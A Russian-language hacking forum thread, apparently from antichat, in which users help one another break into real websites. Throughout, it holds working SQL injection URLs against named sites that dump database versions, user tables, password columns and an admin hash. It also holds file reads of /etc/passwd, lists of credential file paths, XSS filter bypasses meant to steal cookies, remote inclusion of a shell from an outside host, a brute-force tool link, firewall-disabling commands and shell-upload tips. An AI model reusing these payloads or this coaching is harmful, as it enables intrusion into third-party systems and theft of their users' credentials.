там макс что можно, это прочитать файлы..
я откуда знаю что там вобще) я думал есть возможность заливать ) увЫ

']Используй mysql_(real_)*escape_string()
тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без кавычек то

mysql_real_escape_string() вызывает библиотечную функцмю MySQL mysql_real_escape_string, которая добавляет обратную косую черту к следующим символам: \x00, \n, \r, \, ', " and \x1a.

то есть например

$sql="SELECT `password` FROM user where id =".mysql_real_escape_string($_GET['user'])."LIMIT 1";
все равно уязвим.

159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\

hi

sorry for my language

what to do with this

Microsoft JET Database Engine error '80040e10'

No value given for one or more required parameters.

/store/ancillary.asp, line 17

thanx

./docs/danger\0/body.html
- от такая хня получается(
Нулл байт экранируется, включена маджик квот.

AHMED HASSAN Официальный язык форума Русский, будь добр, пользуйся онлайн переводчиками (хотя-бы), или задавай вопросы в английском разделе.

Official language a forum Russian, if you please, use online translators , or ask questions in English section.

По поводу вопроса: это Access
http://forum.antichat.ru/thread50550.html

159932, а что ты ржешь? Я не думал что у него стр идет гетом или постом,а думал что он тупо может ею управлять =\
даже если имеется возможность назначить собственное значение для $str, это никак не позволит выполнить код в file_get_contents(), как было предложено тобой.
тут надо уточнить, если параметры пришедшие из вне вставляються в гверю без скобок
@AkyHa_MaTaTa
без кавычек ;)

http://www.sterlitamak.ru/arxnews.shtml?id=-873+
union+select+1,version(),3,4,5,6,7,8,9,0

подскажите с дальнейшими действиями,я запутался!Каким образом можно узнать полный путь к файлу arxnews.shtml
Хоть что-нибудь подскажите,пожалуйста!:)

http://www.sterlitamak.ru/arxnews.shtml?id=-873+
union+select+1,version(),3,4,5,6,7,8,9,0

подскажите с дальнейшими действиями,я запутался!Каким образом можно узнать полный путь к файлу arxnews.shtml
Хоть что-нибудь подскажите,пожалуйста!:)
http://www.sterlitamak.ru/arxnews.shtml?id=-873+union+select+1,concat(version(),0x3a,DATABASE( ),0x3a,USER()),3,4,5,6,7,8,9,10/*
4.0.24_Debian-10sarge2-log:admstr:adminstr@localhost

А дальше таблици подбирай - ...9,10+from+имятаблици/*

http://www.sterlitamak.ru/arxnews.shtml?id=-873+
union+select+1,version(),3,4,5,6,7,8,9,0

подскажите с дальнейшими действиями,я запутался!Каким образом можно узнать полный путь к файлу arxnews.shtml
Хоть что-нибудь подскажите,пожалуйста!:)


а зачеим тебе путь? там лоад файл запрещен

только подбирать названия?Ничего другого нельзя сделать?
То есть нужно надеятся на удачу?или есть какой-нибудь другой способ
:)

только подбирать названия?Ничего другого нельзя сделать?
То есть нужно надеятся на удачу?или есть какой-нибудь другой способ
:)

нет, только брут. Всё что меньше 5-ой ветки. И удача тут не при чем. Хороший словарь вот нужен.

нет, только брут. Всё что меньше 5-ой ветки. И удача тут не при чем. Хороший словарь вот нужен.

а есть какой-нибудь скрипт для брута или программа?
или все ручками? :)

Есть. Особнно если учесть, что подписи не для красоты только (снизу слева). Ну или мою можешь попробовать скачать - пароль 123 (http://pashkela.narod.ru/progi/MySql4Bruter.rar)

http://www.sterlitamak.ru/arxnews.shtml?id=873{SQLINJ}

select+1,2,3,4,5,6,7,8,9,0+from(????????????)
как правильно составить запрос?table_name?

kevmen К программе есть подробный мануал, сайт и тема, зачем задавать вопросы ещё и сдесь?

https://forum.antichat.ru/threadnav24918-1-10.html

kevmen, воспользуйся брутуром от Пашкелы. Он очень хороший и ничего лишнего... Словарь можно взять от проги SIPT и самому потом добавлять примерами из жизни.
ЗЫ: В 4ой ветке часто таблица с юзерами называется [user()/database()]_user и т.д. Если не понял то приведу пример в твоей ситуации. adminstr_user и т.д... Не проверял. Сам по-подбирай)

kevmen, воспользуйся брутуром от Пашкелы. Он очень хороший и ничего лишнего... Словарь можно взять от проги SIPT и самому потом добавлять примерами из жизни.
ЗЫ: В 4ой ветке часто таблица с юзерами называется [user()/database()]_user и т.д. Если не понял то приведу пример в твоей ситуации. adminstr_user и т.д... Не проверял. Сам по-подбирай)
словарик можно взять и тут https://forum.antichat.ru/thread93547.html =\

Кто еще не в курсе, читаем про PROCEDURE ANALYSE() - с помощью этой процедуры можно выяснить некоторые таблицы в MySQL 4
http://raz0r.name/obzory/sql-inekcii-i-procedure-analyse/

Проблема такова, уязвимость в теге <br> и <b> как можно построить на их базе хсс которую понимают Большенство браузеов а не один Netsape и то 4.* версии? Просьба перед ответом самому проверить,работает ли ета xss...фильтрацыя почти всех спец-символов,ну пишите хоть ними,а там уже может чтото придумаю)

Существует ли хоть малейшая уязвимость ucoz?

Существует ли хоть малейшая уязвимость ucoz?

Ето вопше вопрос не по теме,сдесь задаються вопросы именно по уязвимостям конкретным,а не есть ли они вопше...

SeCriVe,Была:
https://forum.antichat.net/thread98425.html
Не знаю на счет пофиксили ее или нет...

возможно ли узнать местонахождение админики через sql inj допустим в 5 версии mysql/mssql ?

Lancellot Если скуль под рутом и ось фряха. На фре есть возможность просмотра каталога load_file('/'), ну или в хексе. если маджик квот-он

возможно ли узнать местонахождение админики через sql inj допустим в 5 версии mysql/mssql ?
Ну можно, как сказали, через load_file('/'). Смотри пример: file.php?id=-1+1,2,load_file('/etc/passwd'),4,5--
3 - выводимое поле. Я просто привел пример. Если есть ошибка, то загоняешь весь путь к файлу и там рыщешь.

хорошо, спасибо.
теперь идем дальше... если к примеру субд mssql читая INFORMATION_SCHEMA.TABLES отвечает ли какая-нибудь таблица за местонахождение админки, ну естественно не во всех движках?

Ну можно, как сказали, через load_file('/'). Смотри пример: file.php?id=-1+1,2,load_file('/etc/passwd'),4,5--
3 - выводимое поле. Я просто привел пример. Если есть ошибка, то загоняешь весь путь к файлу и там рыщешь.
Не нужно переиначивать мои слова. Полный путь к файлу ничего не даст. Человек просил админку. Просмотр ФАЙЛОВ возможен на любой оси , если есть права(но он ничего не даст), а вот просмотр КАТАЛОГОВ возможен на фряхе. Тоесть, либо читаем конфиги и ищем дирректорию веба, а потом просматриваем её, либо , если есть расскрытие, сразу просматриваем ДИРРЕКТОРИЮ

file.php?id=-1+1,2,load_file('/etc/'),4,5--
Выведит содержимое каталога etc
хорошо, спасибо.
теперь идем дальше... если к примеру субд mssql читая INFORMATION_SCHEMA.TABLES отвечает ли какая-нибудь таблица за местонахождение админки, ну естественно не во всех движках?
НЕТ

при определённых действиях выдаёт ошибку

PerlScript Error error '80004005'

(in cleanup) dbresults failed at C:/Perl/site/lib/MSSQL/Sqllib.pm line 1185.

/index.asp, line 3

???возможно ли чтолибо сдесь?

Помогите пожалуйста, вот нашел уязвимость в таком запросе
Query string: SELECT * FROM events_cal WHERE date='2009-02-05'
когда дописываю '+union select или '+order by например
Query string: SELECT * FROM events_cal WHERE date='2009-02-05' UNION SELECT null,null,null -- дальше после комментария приписывается ' и этой кавычке вообще до лампочки, что перед ней стоит знак комментария или знак завершения запроса ; , то есть запрос выполняется вместе с комментарием и этой кавычкой.
Если не добавлять ' после значения date, то вообще получается
Query string: SELECT * FROM events_cal WHERE date='2009-02-05 UNION SELECT null,null,null -- '

P.s. Может ли это быть связано тут каким то образом с несопоставлением данных, просто у строки date тип данных DATE

попробуй вместо -- использовать /*. -- комент до конца строки , /* до конца запроса или */ . А лучше линк в студию.

попробуй вместо -- использовать /*. -- комент до конца строки , /* до конца запроса или */ . А лучше линк в студию.
При /* ничего не выводиться, просто белая страница, даже если запрос с лишней кавычкой, никаких ошибок нет, просто белая страница...
З.ы. вот ссылка http://www.clubarena.ru/disco/events/2009/02/03'/

В любой запрос можно вклиниться... Главное понять какая там БД, хорошо бы увидеть линк...

Всем спасибо!

Octave_Parango Она простейшая, если лень читать статьи, то может хотя-бы поиск по форуму?
https://forum.antichat.ru/showpost.php?p=1024484&postcount=7287

эм.. обычная скуля.. даже думать не надо, ибо видно запрос =\
http://www.rockportartcenter.com/exhibitions/detail.php?uid=450%27+union+select+1,2,3,4,5,6,7,8 ,version(),10,11,12,13,14,15,16,17,18,19,20,21,22, user()/*

Вот сайт допускает запрос вида http://ts.edu.ru/.../ Можно какнить исрользовать?

Вот сайт допускает запрос вида http://ts.edu.ru/.../ Можно какнить исрользовать?
Можно, для промотра сайта. Где ты тут видешь уязвимость? Ты поднялся корню где и так был.

Это даже для просмотра сайта использовать нельзя.

Вот сайт допускает запрос вида http://ts.edu.ru/.../ Можно какнить исрользовать?
судя по пути на винде стоит сайт

c:\inetpub\ts.edu.ru\includes\common.php :)

и юзается MS SQL ищи скули, читай статьи

Лучше здеся взгляни
http://ts.edu.ru/schools/region/6/?town=-1'
2 groundhog почему нельзя, я например при http://ts.edu.ru/.../
вижу сайт значит можно для просмотра :D .

159932, блин, урлу не ту кинул...
но уже разобрался, пасиб!

Проблема такова, уязвимость в теге <br> и <b> как можно построить на их базе хсс которую понимают Большенство браузеов а не один Netsape и то 4.* версии? Просьба перед ответом самому проверить,работает ли ета xss...фильтрацыя почти всех спец-символов,ну пишите хоть ними,а там уже может чтото придумаю)

Вопрос в силе.

Или хотябы как сделать есле уязвимость в таком примере как

.....<
KOD>...

как можно сделать,есле перерод строки перед кодом??

Допустим есть сайт. На три БД.
Через скулю выводятся данные из БД 1. МОжно ли как то сделать, что бы выводились через эту скулю данные из БД2?

2 hackmen
SELECT * FROM db2.table1

Вот конфигурация сервера:
Apache/2.0.59 (Unix) DAV/2 PHP/5.0.4 mod_ssl/2.0.59 OpenSSL/0.9.8h Sun-ONE-ASP/4.0.2

Вопрос:
Где лежит файл с кодами от ftp???

Вот конфигурация сервера:
Apache/2.0.59 (Unix) DAV/2 PHP/5.0.4 mod_ssl/2.0.59 OpenSSL/0.9.8h Sun-ONE-ASP/4.0.2
Вопрос:
Где лежит файл с кодами от ftp???
а ftp-сервер там какой?

/etc/shadow
/etc/master.passwd
/etc/system/passwd
/etc/security/passwd
мб еще в БД лежат.
зависит не только от версии апача и пхп и прикруток, а от ОС и, как заметил gisTy - фтп сервера(хотя, скорее всего, пох на фтп-демона =) )

Допустим есть сайт. На три БД.
Через скулю выводятся данные из БД 1. МОжно ли как то сделать, что бы выводились через эту скулю данные из БД2?
Узнаешь schema_name вроде как)

Если прав на чтение той базы у текущего юзера нету, то никак ты не прочитаешь данные из той базы...

Нашол вот чё: http://www.bnti.ru/index.asp?tbl=&#x31;&#x27;&#x20;&#x4F;&#x52;&#x20;&#x27;&#x31;&#x27;&#x3D;&#x27;&#x31;%27
Что от сюда полезное???

Нашол вот чё: http://www.bnti.ru/index.asp?tbl=&#x31;&#x27;&#x20;&#x4F;&#x52;&#x20;&#x27;&#x31;&#x27;&#x3D;&#x27;&#x31;%27
Что от сюда полезное???
А что ты тут нашел? o_0

Блин как так 2 раз незаходит:( Лан хоть скрин есть:) Он выдал мне на страницу инфы ....

А что ты тут нашел? o_0
Если разэнкодить символы &#x31;&#x27;&#x20;&#x4F;&#x52;&#x20;&#x27;&#x31;&#x27;&#x3D;&#x27;&#x31;%27 будет 1' OR '1'='1'

Вопрос по XSS

Возсожно ли организовать уязвимость в поле color: у style ?
Фильтр " не пропускает, а если сделать так \"\ то получается такое
<span style="color:\&quot">1</span>

Всем здрастье:) Вот перебрал всю таблицу а пасы ненашол:(
http://ts.edu.ru/schools/region/6/?town=%27+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFOR MATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(%27% 20DBSchool%27,%27school_Need%27,%27school_News%27, %27school_Photo%27,%27school_Teachers%27,%27School _Leavers%27,%27index_Epigraph%27,%27index_bgImage% 27,%27site_news%27,%27SchoolTypes%27,%27blag_News% 27,%27SchoolForms%27,%27vote_Main%27,%27SchoolVids %27,%27v_FullSchoolInfo%27,%27vote_Answers%27,%27R egions%27,%27TownTypes%27,%27school_Main%27,%27%D0 %E0%F1%EF%F0%E5%E4%E5%EB%E5%ED%E8%E5%20%F8%EA%EE%E B%20%EF%EE%20%F0%E5%E3%E8%EE%ED%E0%EC%27,%27Images %27,%27tmpImages%27,%27HelpTypes%27,%27Forums%27,% 27school_History%27,%27sponsor_offers%27,%27Countr ies%27,%27Educations%27,%27Users%27,%27syssegments %27,%27sysconstraints%27,%27Admin_schools%27,%27dt properties%27,%27Admin_Site%27,%27v_School_Need_Fu ll%27,%27v_Sponsor_Offers_Full%27))--

2 IIAPTUZAH
Cочуствую

зы: а в Users\Admin_Site разве ничего нет??
как вариант - тут нет админки\пассы не в этой базе

в админ сайт токо user_id прочитал это:http://forum.antichat.ru/thread30501.html Но там по дркгому и я непонял как извлекать инфу:( Обясните

военная тайна: column_name like '%pass%'
ну или кнопкой:
http://ts.edu.ru/schools/region/6/?town='+or+1=(select+top+1+cast(table_name+as+char )%2bcast(column_name+as+char)+from+information_sch ema.columns+where+column_name+like+'%pass%')--
http://ts.edu.ru/schools/region/6/?town='+or+1=(select+top+1+password+from+users)--

Вобщем столкнулся с интересным сайтом =) либо я где то ошибаюсь либо все так и есть! Вобщем есть SQL вот тут:

hidglobal.com/pr.php?id=-1000+UNION+SELECT+1,2,version(),4,5,6,7--
Версия mysql выше 5 и с помощью SIPT4 я прочитал бд(вот самое интересное):

Database [admin]
Table [administrators ( Rows)]
username
password
Database [blogpriv]
Table [wp_users ( Rows)]
ID
user_login
user_pass
user_nicename
user_email
user_url
user_registered
user_activation_key
user_status
display_name
Database [event_breakouts]
Table [admin ( Rows)]
admin_id
admin_name
admin_pwd
Database [hid_productselector]
Table [hid_administrator ( Rows)]
administrator_username
administrator_password
нашел админку блога(вордпресс) /blog/wp_login.php из бд прочитал пасс, сбрутил его, ввел, а он не подходит =) и больше ничего из админок не нашел! =\ только еще что то order.hidglobal.com но и тут неудача =\ помогите разобраться, а то уже голова кругом идет :confused:

https://orders.hidcorp.com/ a tuta?

Gorev ошибся в написании... вот это второй адресс что я нашел но толку ноль! =\ не подходит ничего или я уже ошибаюсь где то! =\

там много бд, на хосте не один сайт=> вывод напрашивается сам собой ;)
тащи пароли с table_schema=version()

l1ght сейчас гляну еще раз... через 2ip когда смотрел он сказал что всего 3 сайта там =) сейчас перепроверю

Проверил 3 сайта лан буду сейчас еще копаться может что найду

2Kraneg там на сайте basic авторизация, паролей в бд нет

Kraneg, http://www.hidglobal.com/admin/ - доступ запрещен, значит там что то есть интересное аля админка. Поищи.
https://orders.hidcorp.com/ - тут похоже авторизация по .htaccess, значит или брут или голяк.
2ip - часто меня подводит, он скорей как дополнительная помощь

Добрый день уважаемые Гуру и не только. Столкнулся с такой проблемой:
http://www.uq.edu.au/news/emailpage.php?article=17208+order+by+4+--+&option=emailArticle
4 поля, судя по тому что || работает как конкатенация строк, то postgres sql. Как вы могли увидеть это форма для отправки ссылки на новость по e-mail. Сообщения приходят следующего содержания
News Title : UQ academic seeks an end to genocide and mass atrocities
News Date : 19-Jan-2009
News URL : http://www.uq.edu.au/news/index.html?article=17208
Поэтому есть подозрение что одно из 4 полей-дата, но успехов в составлении работоспособного запроса так и не добился(гребаный postgres), Но может вам это удастся лучше меня.

Люди,как обойти фильтрацию круглых скобок? ( () ).Чар и хекс отдыхают,но работают условия типа 1+and+1.= не фильтруется,но фильтруются все виды пробелов,кроме %2b

ЗЫ: Скобки фильтруются потому,что не работают выражения типа (a-b).База данных вроде мускул,щас проверяю.

Ещё вопрос: Выражение a%2bc (тобишь а+b) работает,а выражение 1%2band%2b1=1 - нет.Чем это объясняется ?

В выражение order by + пашет.Group by отключен.Union select также не работает)

Ещё вопрос: Выражение a%2bc (тобишь а+b) работает,а выражение 1%2band%2b1=1 - нет.Чем это объясняется ?
попробуй 1'%2band%2b'1'='1

P.s. Если можешь скинь ссылку сюда или в ПМ

Такой вопрос: если ли какие-нибудь реальные сайты, у которых уязвимость листинга директорий и возможность загрузки файла в эти каталоги. Нужен реальный пример.
Спасибо за помощь.

Такой интересный вопросег:
Вот скуль
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+--+
version() user() database() не проходит...ну думаю и ладно...наугад проверил..5ая ветка..нашол таблу nuke_users в ней поля username, user_password пытаюсь открыть..ошибка,мысля...табл а не в той базе..нашол базу..
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_schema,4,5,6,7+from+info rmation_schema.%20tables+where+table_name=0x6E756B 655F7573657273%20--
edward_swing_s
при запросе
http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,3,4,5,6,7+from+edward_swing_s. nuke_users+--+
тоже ошибка....в чём трабла,мож гдето в синькасисе ошибся...подскажите

Фильтруются скобки..

http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,@@version,4,5,6,7--

Таблица nuke_users - пустая.

http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,table_rows,4,5,6,7+from+inform ation_schema.tables+where+table_name=0x6E756B655F7 573657273--

Да и вообще, админские юзеры хранятся тут:

http://www.swinguru.co.il/modules.php?op=modload&name=4nAlbum&file=index&do=showgall&gid=-11+union+select+1,2,aid,4,5,6,7+from+nuke_authors--

5a4be1fa34e62bb8a6ec6b91d2462f5a:5153

Как SIPT-ом слать POST запросы ? Я поменял В поле Request Type GET на POST,и стал слать запросы.В итоге,в логах апача они отображаются:

127.0.0.1 - - [06/Feb/2009:12:26:47 +0200] "POST /'%20%20AND%201=1/* HTTP/1.1" 404 138 "-" "Microsoft URL Control - 6.01.9782"


Отсюда два вариант: Это либо пост,либо кривой гет )) )

Приветсвую всех!

Возникли вопросы по MS SQL Injection (в mysql inj вроде более менее понимаю)
Итак, начнем :)
1.Нашел я значит ошибку в БД, выдало мне

Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string '123' '.
/zope/zope-bd.asp, line 150

Сделал я запрос order+by и насчитал аж 100 колонок :)
Теперь как же мне посмотреть версию БД, узнать таблицы и посмотреть что в них?
ЧТо то по статьям не могу догнать (прочитал пока только одну, читаю вторую))

Спасибо за ответы заранее, + поставлю обязательно!

версия - 1 or 1=@@version--
таблици - 1+or+1=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)--
колонки - 1+or+1=(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_ SCHEMA.COLUMNS+TABLES+WHERE+TABLE_NAME+NOT+IN+('и мя таблици'))--

Сейчас делаю запрос:
example.ru/index.asp?id=1'+union+select+table_name+from+infor mation_schema.tables--
Выдает название первой таблицы, делаю с лимитом:
example.ru/index.asp?id=1'+union+select+table_name+from+infor mation_schema.tables+limit+1,1--
Выдает: Line 1: Incorrect syntax near '1'.
Как победить? :)

$p01nt
Победить лучше прочтением статьи по MSSQL. Там другой синтаксис. Подойдёт любая, можешь почитать эту :
https://forum.antichat.ru/thread30501.html

Люди,вот такая проблема: Проник в систему,нашёл двиг,на котором крутится сайтец.

Вот функция движная,двиг не определил:



function tep_db_prepare_input($string) {
if (is_string($string)) {
return trim(stripslashes($string));
} elseif (is_array($string)) {
reset($string);
while (list($key, $value) = each($string)) {
$string[$key] = tep_db_prepare_input($value);
}
return $string;
} else {
return $string;
}
}



Она удаляет пробелы и обратные слэши,если это строка,а если это массив,то делает то же самое и для каждого элемента массива.Если это НИ то и НИ другое,то не делает НИЧЕГО,т.е. получается,что фильтрацию мы обошли(и саму функцию частично).Передаю такое:

1+order+by+1 без кавычек.Она мне выдаёт на выходе 2.Почему ? Я так понял,что он определил это как строку,но тогда почему она выполнила такое преобразование ? Пробелов-то нет,и слэшей обратных тем более.Помогите пожалуйста =_=

ЗЫ: Если передать строку в одинарных или в двойных кавычках,то тогда работает третий блок кода,но я сомневаюсь,что сервер позволит мне так играть(из-за magic_quots_gpc.Пока не проверил,но уверен,что включена).

Так... Походу,это osCommerce, Open Source E-Commerce Solutions.Не заметил я что-то )))

http://www.oscommerce.com/

Ухх,убить бы этот сайт нафиг...

$p01nt, как сказал jokester, там отличается синтаксис...
Ты заюзал синтаксис mysql, а для MSSQL нужно по другому:
www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +INFORMATION_SCHEMA.TABLES)--
Узнаем название первой таблици...
Для того, чтоб узнать название следующей, нажно составить запрос вида:
www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' имя полученой таблици'))--
чтоб следующую :
www.site.ru/index.php?id=1'+or+1=(SELECT+TOP+1+TABLE_NAME+FROM +IN FORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME+NOT+IN+(' имя первой таблици','имя второй таблици'))--
и так далее...
Аналогично и с колонками.

2-m0rgan-, ага, я уже разобрался по статье :)

Еще раз я, как мне перебрать все данные в колонке если нет поля ID и т.п.
Т.е. есть только поля:
USERNAME,USERPASSWORD
Запрос выглядит след. образом:
1+or+1=(SELECT+TOP+1+USERNAME+from+DD_Users)--
Напоминаю, я говорю про mssql inj

$p01nt,
http://www.site.ru/index.php?id=1+or+1=(SELECT+TOP+1+cast(USERNAME+as +nvarchar)%2B%27%3A%27%2Bcast(USERPASSWORD+as+ nvarchar)+from+DD_Users)--
Это выведит даные из USERNAME и USERPASSWORD
А на счет перебора, я хз...возможно там только один юзер...

Дык я уже написал вывод, нужен именно перебор!! Там 100% 860 юзеров :)
Как же все таки перебрать?

select username from dd_users where username not in (select top 1(2,3,..,n) username from dd_users)

l1ght, обьясни пожалуйста команду и если можно на моем примере.

2
1+or+1=(select top 1 convert(char,username%2b';'%2buserpassword) from dd_users where username not in (select top 1 username from dd_users))
3
1+or+1=(select top 1 convert(char,username%2b';'%2buserpassword) from dd_users where username not in (select top 2 username from dd_users))
4
1+or+1=(select top 1 convert(char,username%2b';'%2buserpassword) from dd_users where username not in (select top 3 username from dd_users))
and so on

/add Велемир, если про:
но работают условия типа 1+and+1а выражение 1%2band%2b1=1 - нет
.=
видимо модреврайт on)

Никто не поможет чтоли ?

Сформировал запрос под свой url:
+or+1=(select Email from EmailTable where Email not in (select top 2 Email from EmailTable))--
выдает:
Microsoft OLE DB Provider for SQL Server error '80004005'

Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression.

/xxx/xxx.asp, line 156

Возможно ли в php-инъекции как-нибудь вывести содержимое директории, а не файла?

Вот такой SQL inj
http://www.moscowfitness.ru/find.php?cname=bebebe'

Долго не мог подобрать не одной таблицы, а потом попробовал вот так
http://www.moscowfitness.ru/find.php?cname=bebebe' UNION select 1 FROM CLUBS/*

и удивился.

Вышло следующее
select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID

MYSQL заявил, что "Table 'db10002m.clubs' doesn't exist"

Как такое может быть? Для первой части запроса таблица CLUBS есть, а для второй уже нет.
Или это так приведение к нижнему регистру влияет?

p.s. Глобальная задача найти таблицу с комментариями и удалить один из комментариев.

Как такое может быть?


Должно быть таблица clubs находится в другой бд.

http://www.moscowfitness.ru/find.php?cname=bebebe'+or+1=if(ascii(substring((se lect+username+from+phpbb_users+limit+0,1),1,1))>=65,1,0)/*

Если я не намудрил с запросом, то первый символ логина админа форума - 'A'. Дальше сам )

//наверно дальше будет 'dmin' ^^

Хеши лежат в колумне user_password

такой вопрос,
есть скуля http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user+lim it+0,1--
выводит admin,pass
потом меняя limit выводим след записи..
можно ли как нибудь (не используя софта) сразу вывести все записи в браузер одним запросом

п.с http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user--
выводит только первую
п.п.с записей много

Если выводит по одной записи - нет.

Можно, конечно, использовать group_concat(), но будет вывод только 1024 символов (по умолчанию)

z00MAN можешь попробывать group_concat(user,password)

Должно быть таблица clubs находится в другой бд.



Меня по этому поводу тоже мысль посетила, но в SQL запрос вывелся весь на экран и в нем нет явного задания БД для первой таблицы CLUBS

select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID

Если бы даже перед этим запросом выполнялся USE имя_бд то его действие распространялось и на вторую часть запроса.

А доступ нужно получить не к форму а комментариям о фитнес-клубах. Т.е к основным таблицам сайта. А при "отсутствии" даже самой CLUBS подбирать название таблицы с комментами дело бесперспективное.

new_daemon, там 4 ветка, information_schema отсутствует, так что только угадыванием )

Всем доброго времени суток. Хотелось бы знать одну вещь:
является ли www.site.ru/?n=1" уязвимым, если выдается ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2009-02-06 22:49:35", "***.***.***.***", 1) ON DUPLICATE KEY UPDATE page="/?n=1"", ' at line 1
и если да, то как подобрать кол-во таблиц. По этой ссылке http://forum.antichat.ru/thread43966.html говорится, что должна быть ошибка
«The used SELECT statements have a different number of columns»,
но у меня выходит почти та же ошибка (за исключением server version for the right syntax to use near 'UNION%20SELECT%201,%202%20--","2009-02-06 ) ON DUPLI' at line 1)
Может кто нить обьяснит дилетанту, что сие означает? ^_^

Zergius ты прав, это типичная sql иньекция.
Советую при подборе полей использовать order by.
На античате всё есть, юзай поиск.
Удачи;)

p.s.ну а если есть вопросы то задавай.

Здравствуйте
Такой вопрос:
каким образом можно узнать полный путь к тому или иному файлу
Искал в гугле нашел вот
Server.MapPath("")
Прошу помощи!

http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,Server.MapPath(%22%22),3,4,5

http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,2,LOAD_FILE('var/www/index.php'),4,5
пытаюсь вот таким образом,через ошибку
тут magic_quotes on

**************

Путь к файлу вообще как - нибудь можно узнать?через какую-либо функцию?Или запрос

Здравствуйте
Такой вопрос:
каким образом можно узнать полный путь к тому или иному файлу
Искал в гугле нашел вот

Прошу помощи!

http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,Server.MapPath(%22%22),3,4,5

http://www.isj.ph.edu.ro/moodle/
http://www.isj.ph.edu.ro/data/7/
советую прочитать

https://forum.antichat.ru/showthread.php?p=462951
http://forum.antichat.ru/showthread.php?p=259132

подскажите, можно как-нибудь провети XSS если нельзя использовать слова "script" и "javastript"?
(интересует отправка куков)

подскажите, можно как-нибудь провети XSS если нельзя использовать слова "script" и "javastript"?
(интересует отправка куков)
можно попытыаться обойти фильтр :) зашифруй например s и j http://h4k.in/encoding/index.php

в смысле вот так?
<%73cript>alert("hello");</%73cript>
почемуто не работает(
просто как текст выводиться, броузер не воспринимает это как тэги

в смысле вот так?
<%73cript>alert("hello");</%73cript>
почемуто не работает(
просто как текст выводиться, броузер не воспринимает это как тэги
encode decimal entities в линк на кодировщик выше
так же там есть варианты обхода. пробуй.

так-с.. иногда прокатывает изменение регистра, типа <ScRipt> и JavaScript, а иногда, если, к примеру, вырезается слово "script" можно отправить "scrscriptipt", и после удаления слова "script" останется "script".

Наверно, как-нибудь ещё можно :)

Если это паблик двиг,да и даже если не паблик,(те можно скачать), самое верное это посмотреть код, который отвечает за фильтрацию.

мухаха, изменение регистра помогло :D
двиг там походу самопальный, и он не вырезает, а заменяет на **caractères interdits**, это по-французски :)

Помогите разобраться с пхп инъекциями плз :)
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел :)
Подскажите пожалуйста решение)

Помогите разобраться с пхп инъекциями плз :)
Нашел сайт, когда подставляю после index.php?cel= свой урл, открывается сайт с иньекцией и там во фрейме url который я указал.
Решил залить шел, залил шел на ломаную фтпшку и подставил этот url:
index.php?cel=http://site.com/shell.txt
Мне выдало текстовик. Попробовал так
index.php?cel=http://site.com/shell
Так же выдало текстовик
Попробовал так
index.php?cel=http://site.com/shell.php
Вылазит шел доступ для сайта на котором залит шел :)
Подскажите пожалуйста решение)
скорее всего это просто iframe. никакой инъекции тут нет.

Народ, подскажите пожалуйста как отрубить microsoft firewall?
- после выполнения комманды net stop - винда уходит в ребут. При выполнении sc config просит пароль. Может есть кака-либо народная хитрость? )))

net stop - мало, надо:net stop SharedAccess
или В реестре поставь тип запуска отключен и перебутай винду =)

В общем нужно сламать или получить акк админа.Я отсканировал иксспайдеров и вот мне тут написало:

Доступна информация
Список cookie
Описание

1. PHPSESSID=l75f8joisi24poei8f3088q4l5; path=/
2. popup_showed=deleted; expires=Fri, 08-Feb-2008 21:42:33 GMT; path=/; domain=.gta-mp.ru; HttpOnly

Возможно ли получить куки админа? :D

нет

это куки которые тебе сервер на компе оставил. используя эту инфу нельзя получить куки админа.

1. Расскажите пожалуйста реально ли сейчас залить шелл через аватарку? Работает ли способ внедрения своего кода в картинку?
2. Есть 2 шелла на 2 серваках, выход на другие сайты закрыт. Тобишь папки других юзеров посмотреть не могу. Есть ли способы как то проникнуть в другие папки?

1. Реально, работает. нужен инклуд или необходимые анстройки сервера (к примеру через .htaccess)
2. Просто тупо прав не хватает. Ищи локальный сплойт под ОСь или под что-нить другой, что на сервере (например мод апача какой-нить бажный)

1. Реально, работает. нужен инклуд или необходимые анстройки сервера (к примеру через .htaccess)
2. Просто тупо прав не хватает. Ищи локальный сплойт под ОСь или под что-нить другой, что на сервере (например мод апача какой-нить бажный)

Спасибо.
